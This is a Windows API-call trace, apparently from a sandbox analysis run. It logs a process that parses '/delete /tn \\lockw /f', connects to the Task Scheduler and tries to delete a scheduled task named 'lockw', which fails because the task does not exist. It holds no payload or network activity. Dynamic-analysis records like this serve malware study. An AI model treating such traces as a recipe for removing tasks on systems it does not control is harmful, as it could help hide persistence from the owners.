[0371.611] StrStrIW (lpFirst="|delete|", lpSrch="|tn|") returned 0x0
[0371.611] SetLastError (dwErrCode=0x490)
[0371.611] lstrlenW (lpString="?") returned 1
[0371.611] lstrlenW (lpString="?") returned 1
[0371.611] _memicmp (_Buf1=0x7c0c0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.611] lstrlenW (lpString="tn") returned 2
[0371.611] _memicmp (_Buf1=0x7c200, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.611] _vsnwprintf (in: _Buffer=0x7c240, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f568 | out: _Buffer="|?|") returned 3
[0371.611] _vsnwprintf (in: _Buffer=0x7c220, _BufferCount=0x5, _Format="|%s|", _ArgList=0x24f568 | out: _Buffer="|tn|") returned 4
[0371.612] lstrlenW (lpString="|?|") returned 3
[0371.612] lstrlenW (lpString="|tn|") returned 4
[0371.612] SetLastError (dwErrCode=0x490)
[0371.612] lstrlenW (lpString="s") returned 1
[0371.612] lstrlenW (lpString="s") returned 1
[0371.612] _memicmp (_Buf1=0x7c0c0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.612] lstrlenW (lpString="tn") returned 2
[0371.612] _memicmp (_Buf1=0x7c200, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.612] _vsnwprintf (in: _Buffer=0x7c240, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f568 | out: _Buffer="|s|") returned 3
[0371.612] _vsnwprintf (in: _Buffer=0x7c220, _BufferCount=0x5, _Format="|%s|", _ArgList=0x24f568 | out: _Buffer="|tn|") returned 4
[0371.612] lstrlenW (lpString="|s|") returned 3
[0371.612] lstrlenW (lpString="|tn|") returned 4
[0371.613] SetLastError (dwErrCode=0x490)
[0371.613] lstrlenW (lpString="u") returned 1
[0371.613] lstrlenW (lpString="u") returned 1
[0371.613] _memicmp (_Buf1=0x7c0c0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.618] lstrlenW (lpString="tn") returned 2
[0371.618] _memicmp (_Buf1=0x7c200, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.618] _vsnwprintf (in: _Buffer=0x7c240, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f568 | out: _Buffer="|u|") returned 3
[0371.618] _vsnwprintf (in: _Buffer=0x7c220, _BufferCount=0x5, _Format="|%s|", _ArgList=0x24f568 | out: _Buffer="|tn|") returned 4
[0371.619] lstrlenW (lpString="|u|") returned 3
[0371.619] lstrlenW (lpString="|tn|") returned 4
[0371.619] SetLastError (dwErrCode=0x490)
[0371.619] lstrlenW (lpString="p") returned 1
[0371.619] lstrlenW (lpString="p") returned 1
[0371.619] _memicmp (_Buf1=0x7c0c0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.619] lstrlenW (lpString="tn") returned 2
[0371.619] _memicmp (_Buf1=0x7c200, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.619] _vsnwprintf (in: _Buffer=0x7c240, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f568 | out: _Buffer="|p|") returned 3
[0371.619] _vsnwprintf (in: _Buffer=0x7c220, _BufferCount=0x5, _Format="|%s|", _ArgList=0x24f568 | out: _Buffer="|tn|") returned 4
[0371.619] lstrlenW (lpString="|p|") returned 3
[0371.620] lstrlenW (lpString="|tn|") returned 4
[0371.620] SetLastError (dwErrCode=0x490)
[0371.620] lstrlenW (lpString="tn") returned 2
[0371.620] lstrlenW (lpString="tn") returned 2
[0371.620] _memicmp (_Buf1=0x7c0c0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.620] lstrlenW (lpString="tn") returned 2
[0371.620] _memicmp (_Buf1=0x7c200, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.620] _vsnwprintf (in: _Buffer=0x7c240, _BufferCount=0x5, _Format="|%s|", _ArgList=0x24f568 | out: _Buffer="|tn|") returned 4
[0371.620] _vsnwprintf (in: _Buffer=0x7c220, _BufferCount=0x5, _Format="|%s|", _ArgList=0x24f568 | out: _Buffer="|tn|") returned 4
[0371.620] lstrlenW (lpString="|tn|") returned 4
[0371.620] lstrlenW (lpString="|tn|") returned 4
[0371.620] StrStrIW (lpFirst="|tn|", lpSrch="|tn|") returned="|tn|"
[0371.620] SetLastError (dwErrCode=0x0)
[0371.621] SetLastError (dwErrCode=0x0)
[0371.621] lstrlenW (lpString="\\lockw") returned 6
[0371.621] lstrlenW (lpString="-/") returned 2
[0371.621] StrChrIW (lpStart="-/", wMatch=0x5c) returned 0x0
[0371.621] SetLastError (dwErrCode=0x490)
[0371.621] SetLastError (dwErrCode=0x490)
[0371.621] SetLastError (dwErrCode=0x0)
[0371.621] lstrlenW (lpString="\\lockw") returned 6
[0371.621] StrChrIW (lpStart="\\lockw", wMatch=0x3a) returned 0x0
[0371.621] SetLastError (dwErrCode=0x490)
[0371.621] SetLastError (dwErrCode=0x0)
[0371.621] lstrlenW (lpString="\\lockw") returned 6
[0371.621] SetLastError (dwErrCode=0x0)
[0371.622] SetLastError (dwErrCode=0x0)
[0371.622] lstrlenW (lpString="/f") returned 2
[0371.622] lstrlenW (lpString="-/") returned 2
[0371.622] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0371.622] lstrlenW (lpString="delete") returned 6
[0371.622] lstrlenW (lpString="delete") returned 6
[0371.622] _memicmp (_Buf1=0x7c0c0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.622] lstrlenW (lpString="f") returned 1
[0371.622] _memicmp (_Buf1=0x7c200, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.622] _vsnwprintf (in: _Buffer=0x7c240, _BufferCount=0x9, _Format="|%s|", _ArgList=0x24f568 | out: _Buffer="|delete|") returned 8
[0371.623] _vsnwprintf (in: _Buffer=0x7c220, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f568 | out: _Buffer="|f|") returned 3
[0371.623] lstrlenW (lpString="|delete|") returned 8
[0371.623] lstrlenW (lpString="|f|") returned 3
[0371.623] StrStrIW (lpFirst="|delete|", lpSrch="|f|") returned 0x0
[0371.623] SetLastError (dwErrCode=0x490)
[0371.623] lstrlenW (lpString="?") returned 1
[0371.623] lstrlenW (lpString="?") returned 1
[0371.623] _memicmp (_Buf1=0x7c0c0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.623] lstrlenW (lpString="f") returned 1
[0371.623] _memicmp (_Buf1=0x7c200, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.624] _vsnwprintf (in: _Buffer=0x7c240, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f568 | out: _Buffer="|?|") returned 3
[0371.624] _vsnwprintf (in: _Buffer=0x7c220, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f568 | out: _Buffer="|f|") returned 3
[0371.624] lstrlenW (lpString="|?|") returned 3
[0371.624] lstrlenW (lpString="|f|") returned 3
[0371.624] StrStrIW (lpFirst="|?|", lpSrch="|f|") returned 0x0
[0371.625] SetLastError (dwErrCode=0x490)
[0371.625] lstrlenW (lpString="s") returned 1
[0371.625] lstrlenW (lpString="s") returned 1
[0371.625] _memicmp (_Buf1=0x7c0c0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.625] lstrlenW (lpString="f") returned 1
[0371.625] _memicmp (_Buf1=0x7c200, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.625] _vsnwprintf (in: _Buffer=0x7c240, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f568 | out: _Buffer="|s|") returned 3
[0371.625] _vsnwprintf (in: _Buffer=0x7c220, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f568 | out: _Buffer="|f|") returned 3
[0371.626] lstrlenW (lpString="|s|") returned 3
[0371.626] lstrlenW (lpString="|f|") returned 3
[0371.626] StrStrIW (lpFirst="|s|", lpSrch="|f|") returned 0x0
[0371.626] SetLastError (dwErrCode=0x490)
[0371.626] lstrlenW (lpString="u") returned 1
[0371.626] lstrlenW (lpString="u") returned 1
[0371.627] _memicmp (_Buf1=0x7c0c0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.627] lstrlenW (lpString="f") returned 1
[0371.627] _memicmp (_Buf1=0x7c200, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.627] _vsnwprintf (in: _Buffer=0x7c240, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f568 | out: _Buffer="|u|") returned 3
[0371.632] _vsnwprintf (in: _Buffer=0x7c220, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f568 | out: _Buffer="|f|") returned 3
[0371.632] lstrlenW (lpString="|u|") returned 3
[0371.632] lstrlenW (lpString="|f|") returned 3
[0371.632] StrStrIW (lpFirst="|u|", lpSrch="|f|") returned 0x0
[0371.632] SetLastError (dwErrCode=0x490)
[0371.632] lstrlenW (lpString="p") returned 1
[0371.632] lstrlenW (lpString="p") returned 1
[0371.632] _memicmp (_Buf1=0x7c0c0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.633] lstrlenW (lpString="f") returned 1
[0371.633] _memicmp (_Buf1=0x7c200, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.633] _vsnwprintf (in: _Buffer=0x7c240, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f568 | out: _Buffer="|p|") returned 3
[0371.633] _vsnwprintf (in: _Buffer=0x7c220, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f568 | out: _Buffer="|f|") returned 3
[0371.633] lstrlenW (lpString="|p|") returned 3
[0371.633] lstrlenW (lpString="|f|") returned 3
[0371.634] StrStrIW (lpFirst="|p|", lpSrch="|f|") returned 0x0
[0371.634] SetLastError (dwErrCode=0x490)
[0371.634] lstrlenW (lpString="tn") returned 2
[0371.634] lstrlenW (lpString="tn") returned 2
[0371.634] _memicmp (_Buf1=0x7c0c0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.635] lstrlenW (lpString="f") returned 1
[0371.635] _memicmp (_Buf1=0x7c200, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.635] _vsnwprintf (in: _Buffer=0x7c240, _BufferCount=0x5, _Format="|%s|", _ArgList=0x24f568 | out: _Buffer="|tn|") returned 4
[0371.635] _vsnwprintf (in: _Buffer=0x7c220, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f568 | out: _Buffer="|f|") returned 3
[0371.635] lstrlenW (lpString="|tn|") returned 4
[0371.635] lstrlenW (lpString="|f|") returned 3
[0371.635] StrStrIW (lpFirst="|tn|", lpSrch="|f|") returned 0x0
[0371.635] SetLastError (dwErrCode=0x490)
[0371.635] lstrlenW (lpString="f") returned 1
[0371.635] lstrlenW (lpString="f") returned 1
[0371.635] _memicmp (_Buf1=0x7c0c0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.635] lstrlenW (lpString="f") returned 1
[0371.636] _memicmp (_Buf1=0x7c200, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.636] _vsnwprintf (in: _Buffer=0x7c240, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f568 | out: _Buffer="|f|") returned 3
[0371.636] _vsnwprintf (in: _Buffer=0x7c220, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f568 | out: _Buffer="|f|") returned 3
[0371.636] lstrlenW (lpString="|f|") returned 3
[0371.636] lstrlenW (lpString="|f|") returned 3
[0371.637] StrStrIW (lpFirst="|f|", lpSrch="|f|") returned="|f|"
[0371.637] SetLastError (dwErrCode=0x0)
[0371.637] SetLastError (dwErrCode=0x0)
[0371.637] lstrlenW (lpString="\\lockw") returned 6
[0371.643] SetLastError (dwErrCode=0x0)
[0371.643] LoadLibraryExA (lpLibFileName="API-MS-WIN-Service-Management-L1-1-0.dll", hFile=0x0, dwFlags=0x0) returned 0x7fefdef0000
[0371.652] GetProcAddress (hModule=0x7fefdef0000, lpProcName="OpenSCManagerW") returned 0x7fefdef659c
[0371.652] OpenSCManagerW (lpMachineName="", lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x7cfa0
[0371.678] GetProcAddress (hModule=0x7fefdef0000, lpProcName="OpenServiceW") returned 0x7fefdef6484
[0371.678] OpenServiceW (hSCManager=0x7cfa0, lpServiceName="Schedule", dwDesiredAccess=0x14) returned 0x0
[0371.681] GetProcAddress (hModule=0x7fefdef0000, lpProcName="CloseServiceHandle") returned 0x7fefdef6518
[0371.681] CloseServiceHandle (hSCObject=0x7cfa0) returned 1
[0371.746] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0
[0371.790] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0
[0371.814] CoCreateInstance (in: rclsid=0xffe61ae0*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x17, riid=0xffe61ad0*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x24eee0 | out: ppv=0x24eee0*=0x3b7940) returned 0x0
[0371.852] TaskScheduler:ITaskService:Connect (This=0x3b7940, serverName=0x24efc0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), user=0x24ef80*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), domain=0x24efa0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), password=0x24ef60*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0)) returned 0x0
[0371.869] TaskScheduler:IUnknown:AddRef (This=0x3b7940) returned 0x2
[0371.869] TaskScheduler:ITaskService:GetFolder (in: This=0x3b7940, Path=0x0, ppFolder=0x24f030 | out: ppFolder=0x24f030*=0x3b7b00) returned 0x0
[0371.877] GetProcessHeap () returned 0x60000
[0371.877] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x18) returned 0x81190
[0371.877] GetThreadLocale () returned 0x409
[0371.877] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="\\lockw", cchCount1=-1, lpString2="*", cchCount2=-1) returned 3
[0371.877] ITaskFolder:GetTask (in: This=0x3b7b00, Path="\\lockw", ppTask=0x24ef60 | out: ppTask=0x24ef60*=0x0) returned 0x80070002
[0371.878] lstrlenW (lpString="\\lockw") returned 6
[0371.878] GetProcessHeap () returned 0x60000
[0371.878] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0xe) returned 0x81230
[0371.878] GetProcessHeap () returned 0x60000
[0371.878] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x20) returned 0x937e0
[0371.879] ITaskFolder:DeleteTask (This=0x3b7b00, Name="", flags=0) returned 0x80070002
[0371.885] SetLastError (dwErrCode=0x80070002)
[0371.885] GetLastError () returned 0x80070002
[0371.885] FormatMessageW (in: dwFlags=0x1300, lpSource=0x0, dwMessageId=0x80070002, dwLanguageId=0x0, lpBuffer=0x24efd0, nSize=0x0, Arguments=0x0 | out: lpBuffer="开\x09") returned 0x2c
[0371.888] GetLastError () returned 0x80070002
[0371.888] lstrlenW (lpString="The system cannot find the file specified.\r\n") returned 44
[0371.888] GetProcessHeap () returned 0x60000
[0371.888] GetProcessHeap () returned 0x60000
[0371.888] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7b9f0) returned 1
[0371.888] GetProcessHeap () returned 0x60000
[0371.888] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7b9f0) returned 0x2
[0371.888] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7b9f0 | out: hHeap=0x60000) returned 1
[0371.888] GetProcessHeap () returned 0x60000
[0371.888] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x5a) returned 0x95f70
[0371.888] SetLastError (dwErrCode=0x80070002)
[0371.889] LocalFree (hMem=0x95f00) returned 0x0
[0371.889] GetProcessHeap () returned 0x60000
[0371.889] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x20) returned 0x93810
[0371.889] _memicmp (_Buf1=0x7bab0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.889] LoadStringW (in: hInstance=0x0, uID=0x1389, lpBuffer=0x7d2c0, cchBufferMax=256 | out: lpBuffer="ERROR:") returned 0x6
[0371.889] lstrlenW (lpString="ERROR:") returned 6
[0371.889] GetProcessHeap () returned 0x60000
[0371.889] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0xe) returned 0x81210
[0371.889] GetProcessHeap () returned 0x60000
[0371.889] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x18) returned 0x81250
[0371.889] _memicmp (_Buf1=0x81250, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.889] GetProcessHeap () returned 0x60000
[0371.889] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x1000) returned 0x95fe0
[0371.890] _vsnwprintf (in: _Buffer=0x95fe0, _BufferCount=0x7ff, _Format="%s ", _ArgList=0x24eff0 | out: _Buffer="ERROR: ") returned 7
[0371.890] _fileno (_File=0x7feff862ae0) returned 2
[0371.890] _errno () returned 0x3b4bb0
[0371.890] _get_osfhandle (_FileHandle=2) returned 0xb
[0371.890] _errno () returned 0x3b4bb0
[0371.890] GetFileType (hFile=0xb) returned 0x2
[0371.891] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb
[0371.891] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24eed0 | out: lpMode=0x24eed0) returned 1
[0371.892] __iob_func () returned 0x7feff862a80
[0371.892] __iob_func () returned 0x7feff862a80
[0371.892] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb
[0371.892] lstrlenW (lpString="ERROR: ") returned 7
[0371.892] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x95fe0*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x24ef40, lpReserved=0x0 | out: lpBuffer=0x95fe0*, lpNumberOfCharsWritten=0x24ef40*=0x7) returned 1
[0371.893] _fileno (_File=0x7feff862ae0) returned 2
[0371.894] _errno () returned 0x3b4bb0
[0371.894] _get_osfhandle (_FileHandle=2) returned 0xb
[0371.894] _errno () returned 0x3b4bb0
[0371.894] GetFileType (hFile=0xb) returned 0x2
[0371.894] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb
[0371.894] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24ef60 | out: lpMode=0x24ef60) returned 1
[0371.895] __iob_func () returned 0x7feff862a80
[0371.895] __iob_func () returned 0x7feff862a80
[0371.895] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb
[0371.895] lstrlenW (lpString="The system cannot find the file specified.\r\n") returned 44
[0371.895] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x95f70*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x24efd0, lpReserved=0x0 | out: lpBuffer=0x95f70*, lpNumberOfCharsWritten=0x24efd0*=0x2c) returned 1
[0371.896] TaskScheduler:IUnknown:Release (This=0x3b7b00) returned 0x0
[0371.896] TaskScheduler:IUnknown:Release (This=0x3b7940) returned 0x1
[0371.896] GetProcessHeap () returned 0x60000
[0371.897] GetProcessHeap () returned 0x60000
[0371.897] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7c1e0) returned 1
[0371.897] GetProcessHeap () returned 0x60000
[0371.897] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7c1e0) returned 0x16
[0371.897] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7c1e0 | out: hHeap=0x60000) returned 1
[0371.897] GetProcessHeap () returned 0x60000
[0371.897] GetProcessHeap () returned 0x60000
[0371.897] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7b9b0) returned 1
[0371.897] GetProcessHeap () returned 0x60000
[0371.897] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7b9b0) returned 0x18
[0371.897] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7b9b0 | out: hHeap=0x60000) returned 1
[0371.897] GetProcessHeap () returned 0x60000
[0371.898] GetProcessHeap () returned 0x60000
[0371.898] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7cca0) returned 1
[0371.898] GetProcessHeap () returned 0x60000
[0371.898] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7cca0) returned 0x20
[0371.898] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7cca0 | out: hHeap=0x60000) returned 1
[0371.899] GetProcessHeap () returned 0x60000
[0371.899] GetProcessHeap () returned 0x60000
[0371.899] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7c010) returned 1
[0371.899] GetProcessHeap () returned 0x60000
[0371.899] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7c010) returned 0xa0
[0371.899] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7c010 | out: hHeap=0x60000) returned 1
[0371.899] GetProcessHeap () returned 0x60000
[0371.899] GetProcessHeap () returned 0x60000
[0371.899] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7ba90) returned 1
[0371.899] GetProcessHeap () returned 0x60000
[0371.899] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7ba90) returned 0x18
[0371.900] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7ba90 | out: hHeap=0x60000) returned 1
[0371.900] GetProcessHeap () returned 0x60000
[0371.900] GetProcessHeap () returned 0x60000
[0371.900] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7cb80) returned 1
[0371.900] GetProcessHeap () returned 0x60000
[0371.900] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7cb80) returned 0x20
[0371.901] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7cb80 | out: hHeap=0x60000) returned 1
[0371.901] GetProcessHeap () returned 0x60000
[0371.901] GetProcessHeap () returned 0x60000
[0371.901] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7bc10) returned 1
[0371.901] GetProcessHeap () returned 0x60000
[0371.901] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7bc10) returned 0x208
[0371.902] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7bc10 | out: hHeap=0x60000) returned 1
[0371.902] GetProcessHeap () returned 0x60000
[0371.902] GetProcessHeap () returned 0x60000
[0371.902] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7ba70) returned 1
[0371.902] GetProcessHeap () returned 0x60000
[0371.902] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7ba70) returned 0x18
[0371.902] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7ba70 | out: hHeap=0x60000) returned 1
[0371.902] GetProcessHeap () returned 0x60000
[0371.902] GetProcessHeap () returned 0x60000
[0371.902] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x75ca0) returned 1
[0371.902] GetProcessHeap () returned 0x60000
[0371.902] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x75ca0) returned 0x20
[0371.903] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x75ca0 | out: hHeap=0x60000) returned 1
[0371.903] GetProcessHeap () returned 0x60000
[0371.903] GetProcessHeap () returned 0x60000
[0371.903] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7d2c0) returned 1
[0371.903] GetProcessHeap () returned 0x60000
[0371.903] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7d2c0) returned 0x200
[0371.903] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7d2c0 | out: hHeap=0x60000) returned 1
[0371.904] GetProcessHeap () returned 0x60000
[0371.904] GetProcessHeap () returned 0x60000
[0371.904] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7bab0) returned 1
[0371.904] GetProcessHeap () returned 0x60000
[0371.904] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7bab0) returned 0x18
[0371.904] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7bab0 | out: hHeap=0x60000) returned 1
[0371.904] GetProcessHeap () returned 0x60000
[0371.904] GetProcessHeap () returned 0x60000
[0371.904] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x75c10) returned 1
[0371.904] GetProcessHeap () returned 0x60000
[0371.904] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x75c10) returned 0x20
[0371.905] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x75c10 | out: hHeap=0x60000) returned 1
[0371.905] GetProcessHeap () returned 0x60000
[0371.905] GetProcessHeap () returned 0x60000
[0371.905] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x95fe0) returned 1
[0371.905] GetProcessHeap () returned 0x60000
[0371.905] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x95fe0) returned 0x1000
[0371.905] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x95fe0 | out: hHeap=0x60000) returned 1
[0371.905] GetProcessHeap () returned 0x60000
[0371.906] GetProcessHeap () returned 0x60000
[0371.906] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x81250) returned 1
[0371.906] GetProcessHeap () returned 0x60000
[0371.906] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x81250) returned 0x18
[0371.906] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x81250 | out: hHeap=0x60000) returned 1
[0371.906] GetProcessHeap () returned 0x60000
[0371.906] GetProcessHeap () returned 0x60000
[0371.906] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x75be0) returned 1
[0371.906] GetProcessHeap () returned 0x60000
[0371.906] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x75be0) returned 0x20
[0371.907] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x75be0 | out: hHeap=0x60000) returned 1
[0371.907] GetProcessHeap () returned 0x60000
[0371.907] GetProcessHeap () returned 0x60000
[0371.907] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7c220) returned 1
[0371.907] GetProcessHeap () returned 0x60000
[0371.907] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7c220) returned 0x14
[0371.907] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7c220 | out: hHeap=0x60000) returned 1
[0371.907] GetProcessHeap () returned 0x60000
[0371.907] GetProcessHeap () returned 0x60000
[0371.907] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7c200) returned 1
[0371.907] GetProcessHeap () returned 0x60000
[0371.907] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7c200) returned 0x18
[0371.907] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7c200 | out: hHeap=0x60000) returned 1
[0371.908] GetProcessHeap () returned 0x60000
[0371.908] GetProcessHeap () returned 0x60000
[0371.908] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x75b50) returned 1
[0371.908] GetProcessHeap () returned 0x60000
[0371.908] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x75b50) returned 0x20
[0371.908] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x75b50 | out: hHeap=0x60000) returned 1
[0371.908] GetProcessHeap () returned 0x60000
[0371.908] GetProcessHeap () returned 0x60000
[0371.908] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7c240) returned 1
[0371.908] GetProcessHeap () returned 0x60000
[0371.909] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7c240) returned 0x16
[0371.909] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7c240 | out: hHeap=0x60000) returned 1
[0371.909] GetProcessHeap () returned 0x60000
[0371.909] GetProcessHeap () returned 0x60000
[0371.909] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7c0c0) returned 1
[0371.909] GetProcessHeap () returned 0x60000
[0371.909] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7c0c0) returned 0x18
[0371.909] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7c0c0 | out: hHeap=0x60000) returned 1
[0371.909] GetProcessHeap () returned 0x60000
[0371.909] GetProcessHeap () returned 0x60000
[0371.909] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x75b20) returned 1
[0371.909] GetProcessHeap () returned 0x60000
[0371.910] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x75b20) returned 0x20
[0371.910] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x75b20 | out: hHeap=0x60000) returned 1
